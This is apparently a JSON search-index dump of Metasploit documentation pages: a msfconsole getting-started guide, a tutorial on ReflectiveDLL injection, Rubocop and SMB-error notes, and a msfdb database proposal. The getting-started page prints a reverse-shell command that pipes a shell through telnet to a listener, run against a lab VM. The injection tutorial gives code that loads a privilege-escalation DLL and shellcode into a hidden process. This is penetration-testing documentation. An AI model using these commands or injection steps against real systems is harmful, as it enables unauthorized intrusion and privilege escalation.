    "content": "Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the msfconsole command to open Metasploit: . _ _ / \\ /\\ __ _ __ /_/ __ |\\ / | _____ \\ \\ ___ _____ | / \\ _ \\ \\ | \\/| | ___\\ |- -| /\\ / __\\ | -__/ || || |- -|_| | _|__ |_ / -\\ __\\ \\ | | \\__/| |_ |/ |____/ \\___\\/ /\\ \\\\___/ \\/ \\__|_\\ \\___\\ =[ metasploit v6.3.35-dev-0fc88a8050 ] + -- --=[ 2357 exploits - 1227 auxiliary - 413 post ] + -- --=[ 1387 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ msf6 &amp;gt; . Finding modules . Metasploit is based around the concept of modules. The most commonly used module types are: . | Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks | Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host | Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc | Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session. | . You can use the search command to search for modules: . msf6 &amp;gt; search type:auxiliary http html title tag Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/title normal No HTTP HTML Title Tag Content Grabber Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title msf6 &amp;gt; . You can use a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently active module: . msf6 &amp;gt; use auxiliary/scanner/http/title msf6 auxiliary(scanner/http/title) &amp;gt; . Running Auxiliary modules . Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module extracting the HTTP title from a server: . msf6 &amp;gt; use auxiliary/scanner/http/title msf6 auxiliary(scanner/http/title) &amp;gt; . Each module offers configurable options which can be viewed with the show options, or aliased options, command: . msf6 auxiliary(scanner/http/title) &amp;gt; show options Module options (auxiliary/scanner/http/title): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SHOW_TITLES true yes Show the titles on the console as they are grabbed SSL false no Negotiate SSL/TLS for outgoing connections STORE_NOTES true yes Store the captured information in notes. Use \"notes -t http.title\" to view TARGETURI / yes The base path THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host View the full module info with the info, or info -d command. msf6 auxiliary(scanner/http/title) &amp;gt; . To set a module option, use the set command. We will set the RHOST option - which represents the target host(s) that the module will run against: . msf6 auxiliary(scanner/http/title) &amp;gt; set RHOSTS google.com RHOSTS =&amp;gt; google.com . The run command will run the module against the target, showing the target’s HTTP title: . msf6 auxiliary(scanner/http/title) &amp;gt; run [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting both RHOSTS and enabling HttpTrace functionality: . msf6 auxiliary(scanner/http/title) &amp;gt; run rhosts=google.com httptrace=true #################### # Request: #################### GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 #################### # Response: #################### HTTP/1.1 301 Moved Permanently Location: http://www.google.com/ Content-Type: text/html; charset=UTF-8 Server: gws Content-Length: 219 &amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\"&amp;gt; &amp;lt;TITLE&amp;gt;301 Moved&amp;lt;/TITLE&amp;gt;&amp;lt;/HEAD&amp;gt;&amp;lt;BODY&amp;gt; &amp;lt;H1&amp;gt;301 Moved&amp;lt;/H1&amp;gt; The document has moved &amp;lt;A HREF=\"http://www.google.com/\"&amp;gt;here&amp;lt;/A&amp;gt;. &amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt; [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/title) &amp;gt; . Running exploit modules . Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against. For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including: . | Metasploitable2 | Metasploitable3 | . For instance - targeting a vulnerable Metasploitable2 VM and using the unix/misc/distcc_exec module: . msf6 &amp;gt; use unix/misc/distcc_exec [*] Using configured payload cmd/unix/reverse_bash msf6 exploit(unix/misc/distcc_exec) &amp;gt; . Exploit modules will generally at a minimum require the following options to be set: . | RHOST - The remote target host address | LHOST - The listen address. Important This may need to be set to your tun0 IP address or similar, if you are connecting to your target over a VPN | PAYLOAD - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration | . Each module offers configurable options which can be viewed with the show options, or aliased options, command: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3632 yes The target port (TCP) Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(unix/misc/distcc_exec) &amp;gt; . For this scenario you can manually set each of the required option values (RHOST, LHOST, and optionally PAYLOAD): . msf6 exploit(unix/misc/distcc_exec) &amp;gt; set rhost 192.168.123.133 rhost =&amp;gt; 192.168.123.133 msf6 exploit(unix/misc/distcc_exec) &amp;gt; set lhost 192.168.123.1 lhost =&amp;gt; 192.168.123.1 msf6 exploit(unix/misc/distcc_exec) &amp;gt; set payload cmd/unix/reverse payload =&amp;gt; cmd/unix/reverse . The run command will run the module against the target, there is also an aliased exploit command which will perform the same action: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; run [+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh &amp;amp;&amp;amp; break; done 2&amp;gt;&amp;amp;1|telnet 192.168.123.1 4444 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;)' [*] Started reverse TCP double handler on 192.168.123.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo BmpMGFX6NDVlh5h0; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: \"BmpMGFX6NDVlh5h0\\r\\n\" [*] Matching... [*] A is input... [*] Command shell session 2 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100 whoami daemon . New in Metasploit 6 there is added support for running modules with options set as part of the run command: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse [+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh &amp;amp;&amp;amp; break; done 2&amp;gt;&amp;amp;1|telnet 192.168.123.1 4444 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;)' [*] Started reverse TCP double handler on 192.168.123.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo QqL1Uzom6eBFilyL; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: \"QqL1Uzom6eBFilyL\\r\\n\" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100 whoami daemon . ",
    "url": "/docs/using-metasploit/basics/using-metasploit.html#getting-started",
    "relUrl": "/docs/using-metasploit/basics/using-metasploit.html#getting-started"
  },"835": {
    "doc": "Running modules",
    "title": "Running modules",
    "content": " ",
    "url": "/docs/using-metasploit/basics/using-metasploit.html",
    "relUrl": "/docs/using-metasploit/basics/using-metasploit.html"
  },"836": {
    "doc": "ReflectiveDLL Injection",
    "title": "Using the ReflectiveDll loader in a metasploit module.",
    "content": "First, let’s be clear. I have used this exactly once, but there exists little in the way of guidance on how ReflectiveDll injection works in Framework, so I figure poor guidance is better than none. I am in part hoping that someone who knows how it works will come along and correct this, ala Cunningham’s Law. This documentation assumes that you have some familiarity with DLLs already. Step 1 - Make your DLL . Use Visual studio 2013 and make a standard, empty DLL. Do not attempt to add the reflective DLL stuff yet. When you make the DLL, make sure that you have at least three files: A header file with the function declarations, a c(pp) file with the functions that ‘do’ the exploit, and a DllMain file with the DllMain function. I find that testing the DLL outside the reflective loader helps tremendously, so in the header file, I declare my working function as an extern, C-style function: extern \"C\" __declspec (dllexport) void PrivEsc(void); . I think using C as the language over cpp would make life marginally easier, as you can combine the source code into one project. Using cpp meant I needed to have separate projects, or at least using my limited compiler knowledge that’s how I got it to work. I noticed OJ was able to extend his c project (exploits/capcom_sys_exec) to include the reflectiveloader, but I could not seem to do the same for my cpp project. Store your project in external/source/exploits/&amp;lt;identifier&amp;gt;/&amp;lt;projectname&amp;gt;. That’s not written in stone. The project I just finished had both DLL and EXE, so I have external/source/exploits/&amp;lt;identifier&amp;gt;/dll and external/source/exploits/&amp;lt;identifier&amp;gt;/exe. Just don’t be a jerk and do something hard to follow. Your requirements may differ, and we’re not super particular as long as it makes sense. I suggest the identifier to make life easier, then a project name because you’ll be bringing the reflective loader project into the identifier folder, and at least I like to have some separation between the two. Step 2 Write the DLL using an extern, C-linkage entry point to make testing easier . In this case, I was writing a privesc, so I called it PrivEsc because I am super-imaginative and I have done enough code maintenance that I try to be nice to the next dev. By declaring it an external function and using C-style linkages, you can test the function independently using the rundll32.exe binary. For example, if the dll were named mydll.dll, you can run the privEsc alone with the command &amp;gt; rundll.exe mydll.dll, PrivEsc . That way, you can isolate the behavior of the exploit before adding a payload. Because I was using a privesc, I just made the last line of the privesc system(\"cmd.exe\"); so I could verify that on the target machine. If I got a system-level cmd prompt, I won! . Step 3 Add ReflectiveDLL Injection to it. This is actually pretty simple. Once your code is doing what it is supposed to do, add the ReflectiveDLL injection to it. Move the rdi (ReflectiveDLL injection) code into your existing project and add the inject project into your solution. Again, this worked for me and appears to be a popular choice. When you copy the RefelctiveDLL code into your project, you are going to replace your DllMain file with the ReflectiveDll.c file. Include the header file containing your desired entry point so that when DllMain gets launched, it can find your desired entry point. I also noticed and appreciated that others structured the code into two parts: Exploit and Exploiter. Exploiter does the heavy lifting with functions, and Exploit calls the functions and runs the shellcode after the exploit completes. For example, I made a privesc and the code required to accomplish the elevation was bundled in a function called PrivEsc contained within my Exploiter.cpp file. The Exploit file was very simple in comparison: . #include &amp;lt;Windows.h&amp;gt; #include \"Exploit.h\" #include \"Exploiter.h\" static VOID ExecutePayload(LPVOID lpPayload) { VOID(*lpCode)() = (VOID(*)())lpPayload; lpCode(); return; } VOID Exploit(LPVOID lpPayload) { PrivEsc(); ExecutePayload(lpPayload); } . That ExecutePayload function is there to… well…. Execute the payload. We’ll talk about it later, but make sure that you have it accepting a pointer and executing it. That’ll be how we get a payload into the running thread. All the Exploit.cpp needs to do is give a clear way for me to run the code I wanted to get system, then call the function responsible for starting the shellcode. In my case, all I needed to do was to somehow run PrivEsc and then ExecutePayload(pPayload). Sure enough, if you check out the ReflectiveDll.c file, you can see that it is really straightforward and should look a lot like your previous DllMain function, except there’s a function call in DLL_PROCESS_ATTACH: . #include \"ReflectiveLoader.h\" #include \"Exploit.h\" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { BOOL bReturnValue = TRUE; switch (dwReason) { case DLL_QUERY_HMODULE: if (lpReserved != NULL) *(HMODULE *)lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; // MessageBox(0, \"In DLLMain\", \"Status\", MB_OK); Exploit(lpReserved); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; } . One thing to understand- despite the feelings I had reading through the framework side, you must specify the entry point for the code you want executed in DLL_PROCESS_ATTACH. We are going to be (quasi) calling DllMain, and DLL_PROCESS_ATTACH will fire, thus giving us code execution in the remote process context. As you create the rest of your code, remember that lpReserved from DllMain will contain the address of your payload. Be sure that lpReserve has a clear path to your call of ExecutePayload(). Some of the output from the framework side of the injection was confusing to me because I am used to loading DLLs explicitly and implicitly, and some of the framework methods made it sound like we were not relying on DLL_PROCESS_ATTACH. We are, but in a slightly more round-about way. That said, remember if you go back to troubleshooting just your exploit code in the extern function, DLL_PROCESS_ATTACH will still execute if you use rundll32.exe to call your function. Be sure to comment out your calls in DLL_PROCESS_ATTACH if you go back to debugging unless you want dueling exploits. OK, so at this point, you’ve got a DLL with a function that does something you want, and even better, it compiles! Move that binary to the data directory corresponding to the external directory you used above. i.e. if you used external/source/exploits/myfancyexploit, put your binary in data/exploits/myfancyexploit/. If you can automate that move as a post build step, even better! . Now that we have the binary, we need to execute it on target- Enter Framework! . ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#using-the-reflectivedll-loader-in-a-metasploit-module",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#using-the-reflectivedll-loader-in-a-metasploit-module"
  },"837": {
    "doc": "ReflectiveDLL Injection",
    "title": "Step 4: Adding the framework module",
    "content": "Once you’ve got the DLL working and have it compiling with ReflectiveLoader, you have to make a framework module to use it. OJ’s exploits/capcom_sys_exec is a great place to start looking as an examples; it is super easy and simple to read, so let’s review: . (1) Make sure you have a handle to a process. The easiest way be able to get a handle to a process is to launch your own: notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' =&amp;gt; true}) . (2) We need to write to that process and launch a thread in the process, so let’s get a handle to the process with ALL_ACCESS attributes: process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) . (3) Grab the path to your binary file: library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'myfancyexploit', 'myfancyexploit.dll') . Replace the directory and file names with the ones to your binary. (3.5) OJ went ahead and expanded the path; likely this is because he’s used filepath hijacking in the past: library_path = ::File.expand_path(library_path) . (4) Now, here’s where things get fun- inject your DLL directly into the memory of notepad: exploit_mem, offset = inject_dll_into_process(process, library_path) . That function allocates memory in the process and loads up the DLL. There is a second method that allows you to upload DLL data, so you could create a payload using a template and load that without the dll touching the local or remote disk, but I have not had cause to use it. Unfortunately, this is where my grasp of things gets tenuous because it departs from my experience of traditional DLL loading with LoadLibrary and GetProcAddress. We copied the DLL into the remote process memory, but we have not “loaded” it, so DLL_PROCESS_ATTACH is not executed. That’s a good thing, as we have not yet provided the payload! . I square this by basically treating it like process hollowing, but on a thread-level. Watching OJ’s ReflectiveDll injection video might help: https://www.youtube.com/watch?v=ZKznMBWUQ_c . You may want to watch it daily for a month or so. Regardless, now we have a process with our exploit DLL mapped into its memory, but not doing anything. Now we need to get the payload into the process too, so we can get exploit and payload execution. Getting the payload in there is honestly not much different that getting the DLL data in there. (5) Just allocate some RWX memory and copy the shellcode over. There’s a method for that: payload_mem = inject_into_process(process, payload.encoded) . To be clear, That’s the first time you should have dealt with the payload, because while it is annoying how much goes on in the background in Framework, when you know it is happening, Framework is awesome! . Now, if you’ve been paying attention to the return values from the above methods, we have three important values: (1) exploit_mem that has the address of the DLL loaded into memory, (2) offset that (I think) contains the offset to the DllMain function inside the DLL loaded into memory, and (3) payload_mem, that contains the address of your payload. (6) Now, With those three values, and our code stored in the process’s memory, things make a lot more sense. We just need to create a thread in the process and point it to the DllMain function with the address of our payload as the lpReserve parameter. process.thread.create(exploit_mem + offset, payload_mem) . (6) What I’m Still unclear about: (6.1) How do we get the offset value? If we check out inject_dll_into_process, it shows that it is searching the pe for ReflectiveLoader and that’s not a string I can find as an entry point. I do not understand why that gives us the offset to what I believe to be DllMain when it appears to be searching to ReflectiveLoader…? (6.2) There are a few ways to use ReflectiveDllLoader, and I wish I could read more on using it as an import like OJ does in that capcom_sys_exec. ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#step-4-adding-the-framework-module",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#step-4-adding-the-framework-module"
  },"838": {
    "doc": "ReflectiveDLL Injection",
    "title": "ReflectiveDLL Injection",
    "content": "Update: This is kept here mostly for backup purposes. There is now a reflective dll template available that should help you in your efforts a lot more. ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html"
  },"839": {
    "doc": "Using Rubocop",
    "title": "Rubocop",
    "content": "Rubocop is a great tool for beginning and experienced Ruby coders. Previously, we suggested that developers run Rubocop on code to give suggestions for improvement. Since then, we’ve worked hard to get the rules right, and now we ask everyone submitting ruby code to run the code through rubocop with automatic fixes enabled. ",
    "url": "/docs/development/quality/using-rubocop.html#rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#rubocop"
  },"840": {
    "doc": "Using Rubocop",
    "title": "Installing Rubocop",
    "content": "Installing Rubocop is really easy. Simply go to your metasploit-framework directory and run: gem install rubocop . ",
    "url": "/docs/development/quality/using-rubocop.html#installing-rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#installing-rubocop"
  },"841": {
    "doc": "Using Rubocop",
    "title": "Running Rubocop",
    "content": "Run rubocop -a &amp;lt;ruby file&amp;gt; . But I copied it from another module! . Consistency is a virtue only when it is correct. (In all seriousness, use your best judgement here, and don’t be afraid to ask.). Also, we allow cleaning up other modules too, though be forewarned, please have a way to test any modules you clean up! . ",
    "url": "/docs/development/quality/using-rubocop.html#running-rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#running-rubocop"
  },"842": {
    "doc": "Using Rubocop",
    "title": "Using Rubocop",
    "content": " ",
    "url": "/docs/development/quality/using-rubocop.html",
    "relUrl": "/docs/development/quality/using-rubocop.html"
  },"843": {
    "doc": "What my Rex Proto SMB Error means",
    "title": "What does my Rex::Proto::SMB Error mean?",
    "content": "All SMB error codes are explained in the following MSDN documentation: . http://msdn.microsoft.com/en-us/library/ee441884.aspx . The following is a list of commonly seen errors when using an Metasploit module that involves SMB: . | STATUS_ACCESS_DENIED | . If you are testing against newer Windows systems such as Windows 7, by default you will see STATUS_ACCESS_DENIED because these systems no longer allow remote access to the share. To change this, that target machine will need to manually change the LocalAccountTokenFilterPolicy setting to 1 in the registry: . Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System] \"LocalAccountTokenFilterPolicy\"=dword:00000001 . | STATUS_LOGON_FAILURE | . Invalid SMBUSER or SMBPASS datastore option. Or, in Local Security Settings, you should probably set Network access:Sharing and security model for local accounts to “Local users authenticate as themselves”. | STATUS_BAD_NETWORK_NAME | . Invalid SMB share datastore option. | STATUS_LOGON_TYPE_NOT_GRANTED | . On Windows, in Local Security Settings, Network access:Sharing and security model for local accounts to “Local users authenticate as themselves”. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html#what-does-my-rexprotosmb-error-mean",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html#what-does-my-rexprotosmb-error-mean"
  },"844": {
    "doc": "What my Rex Proto SMB Error means",
    "title": "What my Rex Proto SMB Error means",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html"
  },"845": {
    "doc": "Why CVE is not available",
    "title": "Why is a CVE Not Available?",
    "content": "This documentation explains why sometimes you might see this message in either msfconsole or module documentation: . CVE: Not available . This message indicates that, as far as the Metasploit team knows, there is no CVE assigned to that particular module at the moment. There are multiple reasons why this might happen: . | The vendor does not wish to assign a CVE. | There is a delay in the process of assigning a CVE. | The module is not meant to target a specific CVE. Likely something generic. | We are unable to find a matching CVE because there isn’t enough technical information to verify. | . The Metasploit team will continue to monitor existing modules without any CVEs, and update them as needed. If you believe the module’s CVE information is inaccurate or out-of-date, please feel free to submit a pull request to us. Thank you! :-) . ",
    "url": "/docs/using-metasploit/other/why-cve-is-not-available.html#why-is-a-cve-not-available",
    "relUrl": "/docs/using-metasploit/other/why-cve-is-not-available.html#why-is-a-cve-not-available"
  },"846": {
    "doc": "Why CVE is not available",
    "title": "Why CVE is not available",
    "content": " ",
    "url": "/docs/using-metasploit/other/why-cve-is-not-available.html",
    "relUrl": "/docs/using-metasploit/other/why-cve-is-not-available.html"
  },"847": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "Work needed to allow msfdb to use postgresql-common",
    "content": "Linux distributions, such as Debian and Kali Linux, use postgresql-common (Multi-Version/Multi-Cluster PostgreSQL architecture) wrappers to interact with one or more PostgreSQL installations. Therefore, commands such as initdb and pg_ctl are not in the user’s PATH. msfdb currently assumes these programs are available in the PATH. In order to support platforms that use the postgresql-common wrappers, msfdb would need to determine if it is running on such a platform and modify the commands used to perform the various setup and configuration operations. See the section “msfdb support for postgresql-common” for additional details. ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#work-needed-to-allow-msfdb-to-use-postgresql-common",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#work-needed-to-allow-msfdb-to-use-postgresql-common"
  },"848": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "msfdb support for postgresql-common",
    "content": "Requirements . | Determine if the system is using postgresql-common. | Ideally, allow a user without elevated privileges to setup a database for use with Metasploit. | Determine the current version of PostgreSQL on the system when multiple versions might be installed in parallel. | The port number used for the server when pg_createcluster is run without a port number option defaults to the “next free port starting from 5432”. If we don’t specify the port number when calling pg_createcluster we can scrape the port number from the pg_lsclusters output. | . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters --no-header | awk '/^9.6/ { if ($2 == \"msf\") { print $3; } }' 5433 . Notes . Debian’s postgresql-common (Multi-Version/Multi-Cluster PostgreSQL architecture) contains PostgreSQL wrapper tools: . | pg_lsclusters: list all available clusters with their status and configuration | pg_createcluster: wrapper for initdb, sets up the necessary configuration structure . | pg_createcluster [options] version name [-- initdb options] | . | pg_ctlcluster: wrapper for pg_ctl, control the cluster postgres server . | pg_ctlcluster [options] cluster-version cluster-name action – [pg_ctl options] | where action is one of start, stop, restart, reload, promote | . | pg_dropcluster: remove a cluster and its configuration . | pg_dropcluster [–stop] cluster-version cluster-name | . | pg_wrapper: wrapper for PostgreSQL client commands . | client-program [–cluster version/cluster] […] | ( client-program: psql, createdb, dropuser, and all other client programs installed in /usr/lib/postgresql/ version/bin). | . | . The “database cluster” simply refers to a set of databases on a single server rather than a group of multiple database servers. Manually create and initialize MSF database using postgresql-common . Issues . Encountered permissions issues when attempting to create a cluster. pg_createcluster --user=$(whoami) --encoding=UTF8 9.6 msf -- --username=$(whoami) --auth-host=trust --auth-local=trust install: cannot change permissions of '/etc/postgresql/9.6/msf': No such file or directory Error: could not create configuration directory; you might need to run this program with root privileges . Requiring root privileges may be prohibitive to user installs of MSF. How can we create a cluster without root privileges? Adding the user to the postgres group and attempting to sudo -u postgres the command, however, resulted in the same error message. Looking closer at the various commands and discovered the following in the man page for pg_wrapper. PG_CLUSTER_CONF_ROOT This specifies an alternative base directory for cluster configurations. This is usually /etc/postgresql/, but for testing/development purposes you can change this to point to e. g. your home directory, so that you can use the postgresql-common tools without root privileges. Working Solution . Create cluster (“initdb”) to set up the necessary configuration structure: . Note, running mkdir -p $HOME/.local/etc/postgresql; before the pg_createcluster command didn’t stop the “install: cannot change owner and permissions of ‘/home/msfdev/.local/etc/postgresql/9.6’: Operation not permitted” message from appearing. This appears to be a warning only and doesn’t seem to affect cluster creation. mkdir -p $HOME/.local/var/log/postgresql; PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_createcluster --user=$(whoami) --datadir=$HOME/msf-db-datadir --socketdir=$HOME/.local/var/run/postgresql --logfile=$HOME/.local/var/log/postgresql/postgresql-version-msf.log --encoding=UTF8 9.6 msf -- --username=$(whoami) --auth-host=trust --auth-local=trust install: cannot change owner and permissions of '/home/msfdev/.local/etc/postgresql/9.6': Operation not permitted Creating new cluster 9.6/msf ... config /home/msfdev/.local/etc/postgresql/9.6/msf data /home/msfdev/msf-db-datadir locale en_US.UTF-8 socket /home/msfdev/.local/var/run/postgresql port 5433 . Check cluster was successfully created and appears in the list of all available clusters: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 down msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Start postmaster server for the cluster (“pg_ctl”): . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf start . Check that the cluster was successfully started: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 online msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Perform msfdb’s write_db_config method work by manually creating the ~/.msf4/database.yml file: . development: &amp;amp;pgsql adapter: postgresql database: msf username: msf password: Password123 host: 127.0.0.1 port: 5433 pool: 200 production: &amp;amp;production &amp;lt;&amp;lt;: *pgsql test: &amp;lt;&amp;lt;: *pgsql database: msftest username: msftest password: Password123 . Create database users: . Note, these steps are from msfdb’s init_db method. The following example only creates the main MSF user account and not the test account. PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"create user msf with password 'Password123';\" postgres CREATE ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"alter role msf createdb;\" postgres ALTER ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"alter role msf with password 'Password123';\" postgres ALTER ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql createdb --cluster 9.6/msf -O msf -h 127.0.0.1 -U msf -E UTF-8 -T template0 msf . Perform msfdb’s write_db_client_auth_config method work, except it needs to write the pg_hba.conf file now stored in under PG_CLUSTER_CONF_ROOT and inside the version/cluster-name directory. In this example that location is: $HOME/.local/etc/postgresql/9.6/msf/pg_hba.conf. Perform msfdb’s restart_db method work, by stopping and then starting the server. Stop and then start postmaster server for the cluster (“pg_ctl”): . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf stop PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf start . Check that the cluster was successfully started: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 online msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Create initial database schema: . Note, these steps are from msfdb’s init_db method. cd ~/metasploit-framework bundle exec rake db:migrate . Start msfconsole and verify postgresql connection using the db_status command: . # disable or remove ~/.msf4/config if it is configured to auto connect to a data service mv ~/.msf4/config ~/.msf4/config.disable ./msfconsole ... msf5 &amp;gt; db_status [*] Connected to msf. Connection type: postgresql. Drop (delete) the cluster: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf . ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#msfdb-support-for-postgresql-common",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#msfdb-support-for-postgresql-common"
  },"849": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "Work needed to allow msfdb to use postgresql common",
    "content": " ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html"
  },"850": {
    "doc": "Writing GoLang Modules",
    "title": "Writing GoLang Modules",
    "content": "Contributing modules in GO can be achieved in a few simple steps as outlined below. As for supported GO version, we have tested with 1.11.2, no promised for version 2. 1. Location . | Select the appropriate module path based on the type of module you are trying to contribute | Be sure to include appropriate module documentation under here | Test your documentation is correct by executing info -d | . 2. Execution . | Include this line at the top of your module: //usr/bin/env go run \"$0\" \"$@\"; exit \"$?\" | Ensure your file is an executable file | . 3. Setup . | Initialize your module with the module metadata: import \"metasploit/module\" func main() { metadata := &amp;amp;module.Metadata{ Name: \"&amp;lt;module name\", Description: \"&amp;lt;describe&amp;gt;\", Authors: []string{\"&amp;lt;author 1&amp;gt;\", \"&amp;lt;author 2&amp;gt;\"}, Date: \"&amp;lt;date module written\", Type:\"&amp;lt;module type&amp;gt;\", Privileged: &amp;lt;true|false&amp;gt;, References: []module.Reference{}, Options: map[string]module.Option{ \"&amp;lt;option 1\": {Type: \"&amp;lt;type&amp;gt;\", Description: \"&amp;lt;description&amp;gt;\", Required: &amp;lt;true|false&amp;gt;, Default: \"&amp;lt;default&amp;gt;\"}, \"&amp;lt;option 2\": {Type: \"&amp;lt;type&amp;gt;\", Description: \"&amp;lt;description&amp;gt;\", Required: &amp;lt;true|false&amp;gt;, Default: \"&amp;lt;default&amp;gt;\"}, }} module.Init(metadata, &amp;lt;the entry method to your 